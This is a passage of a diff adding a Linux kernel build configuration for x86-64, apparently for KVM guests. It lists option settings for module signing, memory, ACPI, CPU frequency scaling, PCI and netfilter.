+CONFIG_OPROFILE_NMI_TIMER=y
+# CONFIG_KPROBES is not set
+# CONFIG_JUMP_LABEL is not set
+# CONFIG_UPROBES is not set
+# CONFIG_HAVE_64BIT_ALIGNED_ACCESS is not set
+CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS=y
+CONFIG_ARCH_USE_BUILTIN_BSWAP=y
+CONFIG_USER_RETURN_NOTIFIER=y
+CONFIG_HAVE_IOREMAP_PROT=y
+CONFIG_HAVE_KPROBES=y
+CONFIG_HAVE_KRETPROBES=y
+CONFIG_HAVE_OPTPROBES=y
+CONFIG_HAVE_KPROBES_ON_FTRACE=y
+CONFIG_HAVE_NMI=y
+CONFIG_HAVE_ARCH_TRACEHOOK=y
+CONFIG_HAVE_DMA_CONTIGUOUS=y
+CONFIG_GENERIC_SMP_IDLE_THREAD=y
+CONFIG_ARCH_WANTS_DYNAMIC_TASK_STRUCT=y
+CONFIG_HAVE_REGS_AND_STACK_ACCESS_API=y
+CONFIG_HAVE_CLK=y
+CONFIG_HAVE_DMA_API_DEBUG=y
+CONFIG_HAVE_HW_BREAKPOINT=y
+CONFIG_HAVE_MIXED_BREAKPOINTS_REGS=y
+CONFIG_HAVE_USER_RETURN_NOTIFIER=y
+CONFIG_HAVE_PERF_EVENTS_NMI=y
+CONFIG_HAVE_PERF_REGS=y
+CONFIG_HAVE_PERF_USER_STACK_DUMP=y
+CONFIG_HAVE_ARCH_JUMP_LABEL=y
+CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG=y
+CONFIG_HAVE_ALIGNED_STRUCT_PAGE=y
+CONFIG_HAVE_CMPXCHG_LOCAL=y
+CONFIG_HAVE_CMPXCHG_DOUBLE=y
+CONFIG_HAVE_ARCH_SECCOMP_FILTER=y
+CONFIG_SECCOMP_FILTER=y
+CONFIG_HAVE_GCC_PLUGINS=y
+# CONFIG_GCC_PLUGINS is not set
+CONFIG_HAVE_CC_STACKPROTECTOR=y
+CONFIG_CC_STACKPROTECTOR=y
+# CONFIG_CC_STACKPROTECTOR_NONE is not set
+# CONFIG_CC_STACKPROTECTOR_REGULAR is not set
+CONFIG_CC_STACKPROTECTOR_STRONG=y
+CONFIG_HAVE_ARCH_WITHIN_STACK_FRAMES=y
+CONFIG_HAVE_CONTEXT_TRACKING=y
+CONFIG_HAVE_VIRT_CPU_ACCOUNTING_GEN=y
+CONFIG_HAVE_IRQ_TIME_ACCOUNTING=y
+CONFIG_HAVE_ARCH_TRANSPARENT_HUGEPAGE=y
+CONFIG_HAVE_ARCH_HUGE_VMAP=y
+CONFIG_HAVE_ARCH_SOFT_DIRTY=y
+CONFIG_MODULES_USE_ELF_RELA=y
+CONFIG_HAVE_IRQ_EXIT_ON_IRQ_STACK=y
+CONFIG_ARCH_HAS_ELF_RANDOMIZE=y
+CONFIG_HAVE_ARCH_MMAP_RND_BITS=y
+CONFIG_HAVE_EXIT_THREAD=y
+CONFIG_ARCH_MMAP_RND_BITS=28
+CONFIG_HAVE_COPY_THREAD_TLS=y
+CONFIG_HAVE_STACK_VALIDATION=y
+# CONFIG_HAVE_ARCH_HASH is not set
+# CONFIG_ISA_BUS_API is not set
+# CONFIG_CPU_NO_EFFICIENT_FFS is not set
+CONFIG_HAVE_ARCH_VMAP_STACK=y
+CONFIG_VMAP_STACK=y
+
+#
+# GCOV-based kernel profiling
+#
+# CONFIG_GCOV_KERNEL is not set
+CONFIG_ARCH_HAS_GCOV_PROFILE_ALL=y
+# CONFIG_HAVE_GENERIC_DMA_COHERENT is not set
+CONFIG_SLABINFO=y
+CONFIG_RT_MUTEXES=y
+CONFIG_BASE_SMALL=0
+CONFIG_MODULES=y
+# CONFIG_MODULE_FORCE_LOAD is not set
+CONFIG_MODULE_UNLOAD=y
+CONFIG_MODULE_FORCE_UNLOAD=y
+CONFIG_MODVERSIONS=y
+CONFIG_MODULE_SRCVERSION_ALL=y
+CONFIG_MODULE_SIG=y
+CONFIG_MODULE_SIG_FORCE=y
+CONFIG_MODULE_SIG_ALL=y
+# CONFIG_MODULE_SIG_SHA1 is not set
+# CONFIG_MODULE_SIG_SHA224 is not set
+# CONFIG_MODULE_SIG_SHA256 is not set
+# CONFIG_MODULE_SIG_SHA384 is not set
+CONFIG_MODULE_SIG_SHA512=y
+CONFIG_MODULE_SIG_HASH="sha512"
+# CONFIG_MODULE_COMPRESS is not set
+# CONFIG_TRIM_UNUSED_KSYMS is not set
+CONFIG_MODULES_TREE_LOOKUP=y
+CONFIG_BLOCK=y
+CONFIG_BLK_DEV_BSG=y
+CONFIG_BLK_DEV_BSGLIB=y
+CONFIG_BLK_DEV_INTEGRITY=y
+CONFIG_BLK_DEV_THROTTLING=y
+# CONFIG_BLK_CMDLINE_PARSER is not set
+
+#
+# Partition Types
+#
+CONFIG_PARTITION_ADVANCED=y
+# CONFIG_ACORN_PARTITION is not set
+# CONFIG_AIX_PARTITION is not set
+# CONFIG_OSF_PARTITION is not set
+# CONFIG_AMIGA_PARTITION is not set
+# CONFIG_ATARI_PARTITION is not set
+# CONFIG_MAC_PARTITION is not set
+CONFIG_MSDOS_PARTITION=y
+# CONFIG_BSD_DISKLABEL is not set
+# CONFIG_MINIX_SUBPARTITION is not set
+# CONFIG_SOLARIS_X86_PARTITION is not set
+# CONFIG_UNIXWARE_DISKLABEL is not set
+# CONFIG_LDM_PARTITION is not set
+# CONFIG_SGI_PARTITION is not set
+# CONFIG_ULTRIX_PARTITION is not set
+# CONFIG_SUN_PARTITION is not set
+# CONFIG_KARMA_PARTITION is not set
+CONFIG_EFI_PARTITION=y
+# CONFIG_SYSV68_PARTITION is not set
+# CONFIG_CMDLINE_PARTITION is not set
+CONFIG_BLK_MQ_PCI=y
+
+#
+# IO Schedulers
+#
+CONFIG_IOSCHED_NOOP=y
+CONFIG_IOSCHED_DEADLINE=y
+CONFIG_IOSCHED_CFQ=y
+CONFIG_CFQ_GROUP_IOSCHED=y
+# CONFIG_DEFAULT_DEADLINE is not set
+CONFIG_DEFAULT_CFQ=y
+# CONFIG_DEFAULT_NOOP is not set
+CONFIG_DEFAULT_IOSCHED="cfq"
+CONFIG_PREEMPT_NOTIFIERS=y
+CONFIG_ASN1=y
+CONFIG_INLINE_SPIN_UNLOCK_IRQ=y
+CONFIG_INLINE_READ_UNLOCK=y
+CONFIG_INLINE_READ_UNLOCK_IRQ=y
+CONFIG_INLINE_WRITE_UNLOCK=y
+CONFIG_INLINE_WRITE_UNLOCK_IRQ=y
+CONFIG_ARCH_SUPPORTS_ATOMIC_RMW=y
+CONFIG_MUTEX_SPIN_ON_OWNER=y
+CONFIG_RWSEM_SPIN_ON_OWNER=y
+CONFIG_LOCK_SPIN_ON_OWNER=y
+CONFIG_ARCH_USE_QUEUED_SPINLOCKS=y
+CONFIG_QUEUED_SPINLOCKS=y
+CONFIG_ARCH_USE_QUEUED_RWLOCKS=y
+CONFIG_QUEUED_RWLOCKS=y
+CONFIG_FREEZER=y
+
+#
+# Processor type and features
+#
+CONFIG_ZONE_DMA=y
+CONFIG_SMP=y
+CONFIG_X86_FEATURE_NAMES=y
+CONFIG_X86_FAST_FEATURE_TESTS=y
+# CONFIG_X86_X2APIC is not set
+CONFIG_X86_MPPARSE=y
+# CONFIG_GOLDFISH is not set
+CONFIG_RETPOLINE=y
+# CONFIG_X86_EXTENDED_PLATFORM is not set
+# CONFIG_X86_INTEL_LPSS is not set
+# CONFIG_X86_AMD_PLATFORM_DEVICE is not set
+CONFIG_IOSF_MBI=m
+# CONFIG_IOSF_MBI_DEBUG is not set
+CONFIG_SCHED_OMIT_FRAME_POINTER=y
+CONFIG_HYPERVISOR_GUEST=y
+CONFIG_PARAVIRT=y
+# CONFIG_PARAVIRT_DEBUG is not set
+# CONFIG_PARAVIRT_SPINLOCKS is not set
+# CONFIG_XEN is not set
+CONFIG_KVM_GUEST=y
+# CONFIG_KVM_DEBUG_FS is not set
+CONFIG_PARAVIRT_TIME_ACCOUNTING=y
+CONFIG_PARAVIRT_CLOCK=y
+CONFIG_NO_BOOTMEM=y
+# CONFIG_MK8 is not set
+# CONFIG_MK8SSE3 is not set
+# CONFIG_MK10 is not set
+# CONFIG_MBARCELONA is not set
+# CONFIG_MBOBCAT is not set
+# CONFIG_MJAGUAR is not set
+# CONFIG_MBULLDOZER is not set
+# CONFIG_MPILEDRIVER is not set
+# CONFIG_MSTEAMROLLER is not set
+# CONFIG_MEXCAVATOR is not set
+# CONFIG_MZEN is not set
+# CONFIG_MPSC is not set
+# CONFIG_MATOM is not set
+# CONFIG_MCORE2 is not set
+# CONFIG_MNEHALEM is not set
+# CONFIG_MWESTMERE is not set
+# CONFIG_MSILVERMONT is not set
+# CONFIG_MSANDYBRIDGE is not set
+# CONFIG_MIVYBRIDGE is not set
+# CONFIG_MHASWELL is not set
+# CONFIG_MBROADWELL is not set
+# CONFIG_MSKYLAKE is not set
+CONFIG_GENERIC_CPU=y
+# CONFIG_MNATIVE is not set
+CONFIG_X86_INTERNODE_CACHE_SHIFT=6
+CONFIG_X86_L1_CACHE_SHIFT=6
+CONFIG_X86_TSC=y
+CONFIG_X86_CMPXCHG64=y
+CONFIG_X86_CMOV=y
+CONFIG_X86_MINIMUM_CPU_FAMILY=64
+CONFIG_X86_DEBUGCTLMSR=y
+# CONFIG_PROCESSOR_SELECT is not set
+CONFIG_CPU_SUP_INTEL=y
+CONFIG_CPU_SUP_AMD=y
+CONFIG_CPU_SUP_CENTAUR=y
+CONFIG_HPET_TIMER=y
+CONFIG_HPET_EMULATE_RTC=y
+CONFIG_DMI=y
+CONFIG_GART_IOMMU=y
+CONFIG_CALGARY_IOMMU=y
+CONFIG_CALGARY_IOMMU_ENABLED_BY_DEFAULT=y
+CONFIG_SWIOTLB=y
+CONFIG_IOMMU_HELPER=y
+# CONFIG_MAXSMP is not set
+CONFIG_NR_CPUS=16
+CONFIG_SCHED_SMT=y
+CONFIG_SCHED_MC=y
+CONFIG_PREEMPT_NONE=y
+# CONFIG_PREEMPT_VOLUNTARY is not set
+# CONFIG_PREEMPT is not set
+CONFIG_X86_LOCAL_APIC=y
+CONFIG_X86_IO_APIC=y
+CONFIG_X86_REROUTE_FOR_BROKEN_BOOT_IRQS=y
+# CONFIG_X86_MCE is not set
+
+#
+# Performance monitoring
+#
+CONFIG_PERF_EVENTS_INTEL_UNCORE=y
+CONFIG_PERF_EVENTS_INTEL_RAPL=y
+CONFIG_PERF_EVENTS_INTEL_CSTATE=y
+# CONFIG_PERF_EVENTS_AMD_POWER is not set
+# CONFIG_VM86 is not set
+# CONFIG_X86_VSYSCALL_EMULATION is not set
+# CONFIG_I8K is not set
+# CONFIG_MICROCODE is not set
+# CONFIG_X86_MSR is not set
+# CONFIG_X86_CPUID is not set
+CONFIG_ARCH_PHYS_ADDR_T_64BIT=y
+CONFIG_ARCH_DMA_ADDR_T_64BIT=y
+# CONFIG_NUMA is not set
+CONFIG_ARCH_SPARSEMEM_ENABLE=y
+CONFIG_ARCH_SPARSEMEM_DEFAULT=y
+CONFIG_ARCH_SELECT_MEMORY_MODEL=y
+# CONFIG_ARCH_MEMORY_PROBE is not set
+CONFIG_ILLEGAL_POINTER_VALUE=0xdead000000000000
+CONFIG_SELECT_MEMORY_MODEL=y
+CONFIG_SPARSEMEM_MANUAL=y
+CONFIG_SPARSEMEM=y
+CONFIG_HAVE_MEMORY_PRESENT=y
+CONFIG_SPARSEMEM_EXTREME=y
+CONFIG_SPARSEMEM_VMEMMAP_ENABLE=y
+CONFIG_SPARSEMEM_ALLOC_MEM_MAP_TOGETHER=y
+CONFIG_SPARSEMEM_VMEMMAP=y
+CONFIG_HAVE_MEMBLOCK=y
+CONFIG_HAVE_MEMBLOCK_NODE_MAP=y
+CONFIG_ARCH_DISCARD_MEMBLOCK=y
+CONFIG_MEMORY_ISOLATION=y
+CONFIG_HAVE_BOOTMEM_INFO_NODE=y
+CONFIG_MEMORY_HOTPLUG=y
+CONFIG_MEMORY_HOTPLUG_SPARSE=y
+CONFIG_MEMORY_HOTPLUG_DEFAULT_ONLINE=y
+CONFIG_MEMORY_HOTREMOVE=y
+CONFIG_SPLIT_PTLOCK_CPUS=4
+CONFIG_ARCH_ENABLE_SPLIT_PMD_PTLOCK=y
+CONFIG_MEMORY_BALLOON=y
+CONFIG_BALLOON_COMPACTION=y
+CONFIG_COMPACTION=y
+CONFIG_MIGRATION=y
+CONFIG_PHYS_ADDR_T_64BIT=y
+# CONFIG_BOUNCE is not set
+CONFIG_VIRT_TO_BUS=y
+CONFIG_MMU_NOTIFIER=y
+CONFIG_KSM=y
+CONFIG_DEFAULT_MMAP_MIN_ADDR=65536
+# CONFIG_TRANSPARENT_HUGEPAGE is not set
+# CONFIG_CLEANCACHE is not set
+# CONFIG_FRONTSWAP is not set
+# CONFIG_CMA is not set
+# CONFIG_ZPOOL is not set
+# CONFIG_ZBUD is not set
+# CONFIG_ZSMALLOC is not set
+CONFIG_GENERIC_EARLY_IOREMAP=y
+CONFIG_ARCH_SUPPORTS_DEFERRED_STRUCT_PAGE_INIT=y
+# CONFIG_DEFERRED_STRUCT_PAGE_INIT is not set
+# CONFIG_IDLE_PAGE_TRACKING is not set
+# CONFIG_ZONE_DEVICE is not set
+CONFIG_FRAME_VECTOR=y
+CONFIG_ARCH_USES_HIGH_VMA_FLAGS=y
+CONFIG_ARCH_HAS_PKEYS=y
+# CONFIG_X86_PMEM_LEGACY is not set
+# CONFIG_X86_CHECK_BIOS_CORRUPTION is not set
+CONFIG_X86_RESERVE_LOW=64
+CONFIG_MTRR=y
+# CONFIG_MTRR_SANITIZER is not set
+CONFIG_X86_PAT=y
+CONFIG_ARCH_USES_PG_UNCACHED=y
+CONFIG_ARCH_RANDOM=y
+CONFIG_X86_SMAP=y
+# CONFIG_X86_INTEL_MPX is not set
+CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS=y
+CONFIG_EFI=y
+CONFIG_EFI_STUB=y
+CONFIG_EFI_MIXED=y
+CONFIG_SECCOMP=y
+# CONFIG_HZ_100 is not set
+# CONFIG_HZ_250 is not set
+CONFIG_HZ_300=y
+# CONFIG_HZ_1000 is not set
+CONFIG_HZ=300
+CONFIG_SCHED_HRTICK=y
+# CONFIG_KEXEC is not set
+# CONFIG_KEXEC_FILE is not set
+# CONFIG_CRASH_DUMP is not set
+CONFIG_PHYSICAL_START=0x1000000
+CONFIG_RELOCATABLE=y
+CONFIG_RANDOMIZE_BASE=y
+CONFIG_X86_NEED_RELOCS=y
+CONFIG_PHYSICAL_ALIGN=0x1000000
+CONFIG_RANDOMIZE_MEMORY=y
+CONFIG_RANDOMIZE_MEMORY_PHYSICAL_PADDING=0xa
+CONFIG_HOTPLUG_CPU=y
+# CONFIG_BOOTPARAM_HOTPLUG_CPU0 is not set
+# CONFIG_DEBUG_HOTPLUG_CPU0 is not set
+# CONFIG_LEGACY_VSYSCALL_NATIVE is not set
+# CONFIG_LEGACY_VSYSCALL_EMULATE is not set
+CONFIG_LEGACY_VSYSCALL_NONE=y
+# CONFIG_CMDLINE_BOOL is not set
+# CONFIG_MODIFY_LDT_SYSCALL is not set
+CONFIG_HAVE_LIVEPATCH=y
+CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y
+CONFIG_ARCH_ENABLE_MEMORY_HOTREMOVE=y
+
+#
+# Power management and ACPI options
+#
+# CONFIG_SUSPEND is not set
+# CONFIG_HIBERNATION is not set
+CONFIG_PM=y
+# CONFIG_PM_DEBUG is not set
+CONFIG_PM_CLK=y
+CONFIG_PM_GENERIC_DOMAINS=y
+# CONFIG_WQ_POWER_EFFICIENT_DEFAULT is not set
+CONFIG_ACPI=y
+CONFIG_ACPI_LEGACY_TABLES_LOOKUP=y
+CONFIG_ARCH_MIGHT_HAVE_ACPI_PDC=y
+CONFIG_ACPI_SYSTEM_POWER_STATES_SUPPORT=y
+# CONFIG_ACPI_DEBUGGER is not set
+# CONFIG_ACPI_PROCFS_POWER is not set
+CONFIG_ACPI_REV_OVERRIDE_POSSIBLE=y
+# CONFIG_ACPI_EC_DEBUGFS is not set
+CONFIG_ACPI_AC=y
+CONFIG_ACPI_BATTERY=y
+CONFIG_ACPI_BUTTON=y
+CONFIG_ACPI_VIDEO=y
+CONFIG_ACPI_FAN=y
+# CONFIG_ACPI_DOCK is not set
+CONFIG_ACPI_CPU_FREQ_PSS=y
+CONFIG_ACPI_PROCESSOR_CSTATE=y
+CONFIG_ACPI_PROCESSOR_IDLE=y
+CONFIG_ACPI_PROCESSOR=y
+CONFIG_ACPI_HOTPLUG_CPU=y
+# CONFIG_ACPI_PROCESSOR_AGGREGATOR is not set
+CONFIG_ACPI_THERMAL=y
+# CONFIG_ACPI_CUSTOM_DSDT is not set
+CONFIG_ARCH_HAS_ACPI_TABLE_UPGRADE=y
+CONFIG_ACPI_TABLE_UPGRADE=y
+# CONFIG_ACPI_DEBUG is not set
+CONFIG_ACPI_PCI_SLOT=y
+CONFIG_X86_PM_TIMER=y
+CONFIG_ACPI_CONTAINER=y
+CONFIG_ACPI_HOTPLUG_MEMORY=y
+CONFIG_ACPI_HOTPLUG_IOAPIC=y
+CONFIG_ACPI_SBS=y
+CONFIG_ACPI_HED=y
+# CONFIG_ACPI_CUSTOM_METHOD is not set
+# CONFIG_ACPI_BGRT is not set
+# CONFIG_ACPI_REDUCED_HARDWARE_ONLY is not set
+CONFIG_ACPI_NFIT=m
+CONFIG_HAVE_ACPI_APEI=y
+CONFIG_HAVE_ACPI_APEI_NMI=y
+CONFIG_ACPI_APEI=y
+CONFIG_ACPI_APEI_GHES=y
+CONFIG_ACPI_APEI_PCIEAER=y
+# CONFIG_ACPI_APEI_EINJ is not set
+# CONFIG_ACPI_APEI_ERST_DEBUG is not set
+CONFIG_DPTF_POWER=m
+CONFIG_ACPI_WATCHDOG=y
+CONFIG_PMIC_OPREGION=y
+CONFIG_ACPI_CONFIGFS=y
+CONFIG_SFI=y
+
+#
+# CPU Frequency scaling
+#
+CONFIG_CPU_FREQ=y
+CONFIG_CPU_FREQ_GOV_ATTR_SET=y
+CONFIG_CPU_FREQ_GOV_COMMON=y
+CONFIG_CPU_FREQ_STAT=y
+# CONFIG_CPU_FREQ_STAT_DETAILS is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_POWERSAVE is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE is not set
+CONFIG_CPU_FREQ_DEFAULT_GOV_ONDEMAND=y
+# CONFIG_CPU_FREQ_DEFAULT_GOV_CONSERVATIVE is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_SCHEDUTIL is not set
+CONFIG_CPU_FREQ_GOV_PERFORMANCE=y
+CONFIG_CPU_FREQ_GOV_POWERSAVE=m
+CONFIG_CPU_FREQ_GOV_USERSPACE=m
+CONFIG_CPU_FREQ_GOV_ONDEMAND=y
+CONFIG_CPU_FREQ_GOV_CONSERVATIVE=m
+CONFIG_CPU_FREQ_GOV_SCHEDUTIL=y
+
+#
+# CPU frequency scaling drivers
+#
+CONFIG_X86_INTEL_PSTATE=y
+CONFIG_X86_PCC_CPUFREQ=m
+CONFIG_X86_ACPI_CPUFREQ=m
+CONFIG_X86_ACPI_CPUFREQ_CPB=y
+CONFIG_X86_POWERNOW_K8=m
+CONFIG_X86_AMD_FREQ_SENSITIVITY=m
+# CONFIG_X86_SPEEDSTEP_CENTRINO is not set
+CONFIG_X86_P4_CLOCKMOD=m
+
+#
+# shared options
+#
+CONFIG_X86_SPEEDSTEP_LIB=m
+
+#
+# CPU Idle
+#
+CONFIG_CPU_IDLE=y
+CONFIG_CPU_IDLE_GOV_LADDER=y
+CONFIG_CPU_IDLE_GOV_MENU=y
+# CONFIG_ARCH_NEEDS_CPU_IDLE_COUPLED is not set
+CONFIG_INTEL_IDLE=y
+
+#
+# Memory power savings
+#
+# CONFIG_I7300_IDLE is not set
+
+#
+# Bus options (PCI etc.)
+#
+CONFIG_PCI=y
+CONFIG_PCI_DIRECT=y
+CONFIG_PCI_MMCONFIG=y
+CONFIG_PCI_DOMAINS=y
+# CONFIG_PCI_CNB20LE_QUIRK is not set
+CONFIG_PCIEPORTBUS=y
+CONFIG_HOTPLUG_PCI_PCIE=y
+CONFIG_PCIEAER=y
+CONFIG_PCIE_ECRC=y
+# CONFIG_PCIEAER_INJECT is not set
+CONFIG_PCIEASPM=y
+# CONFIG_PCIEASPM_DEBUG is not set
+CONFIG_PCIEASPM_DEFAULT=y
+# CONFIG_PCIEASPM_POWERSAVE is not set
+# CONFIG_PCIEASPM_PERFORMANCE is not set
+CONFIG_PCIE_PME=y
+CONFIG_PCIE_DPC=y
+CONFIG_PCIE_PTM=y
+CONFIG_PCI_BUS_ADDR_T_64BIT=y
+CONFIG_PCI_MSI=y
+CONFIG_PCI_MSI_IRQ_DOMAIN=y
+# CONFIG_PCI_DEBUG is not set
+CONFIG_PCI_REALLOC_ENABLE_AUTO=y
+# CONFIG_PCI_STUB is not set
+CONFIG_HT_IRQ=y
+CONFIG_PCI_ATS=y
+CONFIG_PCI_IOV=y
+CONFIG_PCI_PRI=y
+CONFIG_PCI_PASID=y
+CONFIG_PCI_LABEL=y
+CONFIG_HOTPLUG_PCI=y
+CONFIG_HOTPLUG_PCI_ACPI=y
+CONFIG_HOTPLUG_PCI_ACPI_IBM=m
+CONFIG_HOTPLUG_PCI_CPCI=y
+CONFIG_HOTPLUG_PCI_CPCI_ZT5550=m
+CONFIG_HOTPLUG_PCI_CPCI_GENERIC=m
+CONFIG_HOTPLUG_PCI_SHPC=m
+
+#
+# PCI host controller drivers
+#
+CONFIG_PCIE_DW_PLAT=y
+CONFIG_PCIE_DW=y
+CONFIG_VMD=m
+# CONFIG_ISA_BUS is not set
+CONFIG_ISA_DMA_API=y
+CONFIG_AMD_NB=y
+CONFIG_PCCARD=m
+CONFIG_PCMCIA=m
+CONFIG_PCMCIA_LOAD_CIS=y
+CONFIG_CARDBUS=y
+
+#
+# PC-card bridges
+#
+CONFIG_YENTA=m
+CONFIG_YENTA_O2=y
+CONFIG_YENTA_RICOH=y
+CONFIG_YENTA_TI=y
+CONFIG_YENTA_ENE_TUNE=y
+CONFIG_YENTA_TOSHIBA=y
+CONFIG_PD6729=m
+CONFIG_I82092=m
+CONFIG_PCCARD_NONSTATIC=y
+# CONFIG_RAPIDIO is not set
+CONFIG_X86_SYSFB=y
+
+#
+# Executable file formats / Emulations
+#
+CONFIG_BINFMT_ELF=y
+CONFIG_ELFCORE=y
+CONFIG_CORE_DUMP_DEFAULT_ELF_HEADERS=y
+CONFIG_BINFMT_SCRIPT=y
+# CONFIG_HAVE_AOUT is not set
+# CONFIG_BINFMT_MISC is not set
+CONFIG_COREDUMP=y
+# CONFIG_IA32_EMULATION is not set
+# CONFIG_X86_X32 is not set
+CONFIG_X86_DEV_DMA_OPS=y
+CONFIG_PMC_ATOM=y
+CONFIG_NET=y
+CONFIG_NET_INGRESS=y
+
+#
+# Networking options
+#
+CONFIG_PACKET=y
+CONFIG_PACKET_DIAG=y
+CONFIG_UNIX=y
+CONFIG_UNIX_DIAG=y
+CONFIG_XFRM=y
+CONFIG_XFRM_ALGO=y
+CONFIG_XFRM_USER=y
+# CONFIG_XFRM_SUB_POLICY is not set
+# CONFIG_XFRM_MIGRATE is not set
+# CONFIG_XFRM_STATISTICS is not set
+CONFIG_XFRM_IPCOMP=m
+CONFIG_NET_KEY=y
+# CONFIG_NET_KEY_MIGRATE is not set
+CONFIG_INET=y
+# CONFIG_IP_MULTICAST is not set
+# CONFIG_IP_ADVANCED_ROUTER is not set
+CONFIG_IP_ROUTE_CLASSID=y
+# CONFIG_IP_PNP is not set
+CONFIG_NET_IPIP=m
+CONFIG_NET_IPGRE_DEMUX=m
+CONFIG_NET_IP_TUNNEL=y
+CONFIG_NET_IPGRE=m
+CONFIG_SYN_COOKIES=y
+CONFIG_NET_IPVTI=m
+CONFIG_NET_UDP_TUNNEL=y
+# CONFIG_NET_FOU is not set
+# CONFIG_NET_FOU_IP_TUNNELS is not set
+CONFIG_INET_AH=m
+CONFIG_INET_ESP=m
+CONFIG_INET_IPCOMP=m
+CONFIG_INET_XFRM_TUNNEL=m
+CONFIG_INET_TUNNEL=m
+CONFIG_INET_XFRM_MODE_TRANSPORT=m
+CONFIG_INET_XFRM_MODE_TUNNEL=m
+CONFIG_INET_XFRM_MODE_BEET=m
+CONFIG_INET_DIAG=m
+CONFIG_INET_TCP_DIAG=m
+CONFIG_INET_UDP_DIAG=m
+CONFIG_INET_DIAG_DESTROY=y
+# CONFIG_TCP_CONG_ADVANCED is not set
+CONFIG_TCP_CONG_CUBIC=y
+CONFIG_DEFAULT_TCP_CONG="cubic"
+CONFIG_TCP_MD5SIG=y
+# CONFIG_IPV6 is not set
+# CONFIG_NETLABEL is not set
+CONFIG_NETWORK_SECMARK=y
+CONFIG_NET_PTP_CLASSIFY=y
+CONFIG_NETWORK_PHY_TIMESTAMPING=y
+CONFIG_NETFILTER=y
+# CONFIG_NETFILTER_DEBUG is not set
+CONFIG_NETFILTER_ADVANCED=y
+CONFIG_BRIDGE_NETFILTER=y
+
+#
+# Core Netfilter Configuration
+#
+CONFIG_NETFILTER_INGRESS=y
+CONFIG_NETFILTER_NETLINK=y
+CONFIG_NETFILTER_NETLINK_ACCT=y
+CONFIG_NETFILTER_NETLINK_QUEUE=y
+CONFIG_NETFILTER_NETLINK_LOG=y
+CONFIG_NF_CONNTRACK=y
+CONFIG_NF_LOG_COMMON=y
+CONFIG_NF_CONNTRACK_MARK=y
+CONFIG_NF_CONNTRACK_SECMARK=y
+CONFIG_NF_CONNTRACK_ZONES=y
+CONFIG_NF_CONNTRACK_PROCFS=y
+CONFIG_NF_CONNTRACK_EVENTS=y
+CONFIG_NF_CONNTRACK_TIMEOUT=y
+CONFIG_NF_CONNTRACK_TIMESTAMP=y
+CONFIG_NF_CONNTRACK_LABELS=y
+CONFIG_NF_CT_PROTO_DCCP=y
+CONFIG_NF_CT_PROTO_GRE=y
+CONFIG_NF_CT_PROTO_SCTP=y
+CONFIG_NF_CT_PROTO_UDPLITE=y
+CONFIG_NF_CONNTRACK_AMANDA=y
+CONFIG_NF_CONNTRACK_FTP=y
+CONFIG_NF_CONNTRACK_H323=y
+CONFIG_NF_CONNTRACK_IRC=y
+CONFIG_NF_CONNTRACK_BROADCAST=y
+CONFIG_NF_CONNTRACK_NETBIOS_NS=y
+CONFIG_NF_CONNTRACK_SNMP=y
+CONFIG_NF_CONNTRACK_PPTP=y
+CONFIG_NF_CONNTRACK_SANE=y
+CONFIG_NF_CONNTRACK_SIP=y
+CONFIG_NF_CONNTRACK_TFTP=y
+CONFIG_NF_CT_NETLINK=y
+CONFIG_NF_CT_NETLINK_TIMEOUT=y
+CONFIG_NF_CT_NETLINK_HELPER=y
+CONFIG_NETFILTER_NETLINK_GLUE_CT=y
+CONFIG_NF_NAT=y
+CONFIG_NF_NAT_NEEDED=y
+CONFIG_NF_NAT_PROTO_DCCP=y
+CONFIG_NF_NAT_PROTO_UDPLITE=y
+CONFIG_NF_NAT_PROTO_SCTP=y
+CONFIG_NF_NAT_AMANDA=y
+CONFIG_NF_NAT_FTP=y
+CONFIG_NF_NAT_IRC=y
+CONFIG_NF_NAT_SIP=y
+CONFIG_NF_NAT_TFTP=y
+CONFIG_NF_NAT_REDIRECT=y
+CONFIG_NETFILTER_SYNPROXY=y
+CONFIG_NF_TABLES=y
+CONFIG_NF_TABLES_NETDEV=y
+CONFIG_NFT_EXTHDR=y
+CONFIG_NFT_META=y
+CONFIG_NFT_NUMGEN=y
+CONFIG_NFT_CT=y
+CONFIG_NFT_SET_RBTREE=y
+CONFIG_NFT_SET_HASH=y
+CONFIG_NFT_COUNTER=y
+CONFIG_NFT_LOG=y
+CONFIG_NFT_LIMIT=y
+CONFIG_NFT_MASQ=y
+CONFIG_NFT_REDIR=y
+CONFIG_NFT_NAT=y
+CONFIG_NFT_QUEUE=y
+CONFIG_NFT_QUOTA=y
+CONFIG_NFT_REJECT=y
+# CONFIG_NFT_COMPAT is not set
+CONFIG_NFT_HASH=y
+CONFIG_NF_DUP_NETDEV=y
+CONFIG_NFT_DUP_NETDEV=y
+CONFIG_NFT_FWD_NETDEV=y
+CONFIG_NETFILTER_XTABLES=y
+
+#
+# Xtables combined modules
+#
+CONFIG_NETFILTER_XT_MARK=y
+CONFIG_NETFILTER_XT_CONNMARK=y
+CONFIG_NETFILTER_XT_SET=y
+
+#
+# Xtables targets
+#
+CONFIG_NETFILTER_XT_TARGET_AUDIT=y
+CONFIG_NETFILTER_XT_TARGET_CHECKSUM=y
+CONFIG_NETFILTER_XT_TARGET_CLASSIFY=y
+CONFIG_NETFILTER_XT_TARGET_CONNMARK=y
+CONFIG_NETFILTER_XT_TARGET_CONNSECMARK=y
+CONFIG_NETFILTER_XT_TARGET_CT=y
+CONFIG_NETFILTER_XT_TARGET_DSCP=y
+CONFIG_NETFILTER_XT_TARGET_HL=y
+CONFIG_NETFILTER_XT_TARGET_HMARK=y
+CONFIG_NETFILTER_XT_TARGET_IDLETIMER=y
+CONFIG_NETFILTER_XT_TARGET_LED=m
+CONFIG_NETFILTER_XT_TARGET_LOG=y
+CONFIG_NETFILTER_XT_TARGET_MARK=y
+CONFIG_NETFILTER_XT_NAT=y
+CONFIG_NETFILTER_XT_TARGET_NETMAP=y
+CONFIG_NETFILTER_XT_TARGET_NFLOG=y
+CONFIG_NETFILTER_XT_TARGET_NFQUEUE=y
+CONFIG_NETFILTER_XT_TARGET_NOTRACK=y
+CONFIG_NETFILTER_XT_TARGET_RATEEST=y
+CONFIG_NETFILTER_XT_TARGET_REDIRECT=y
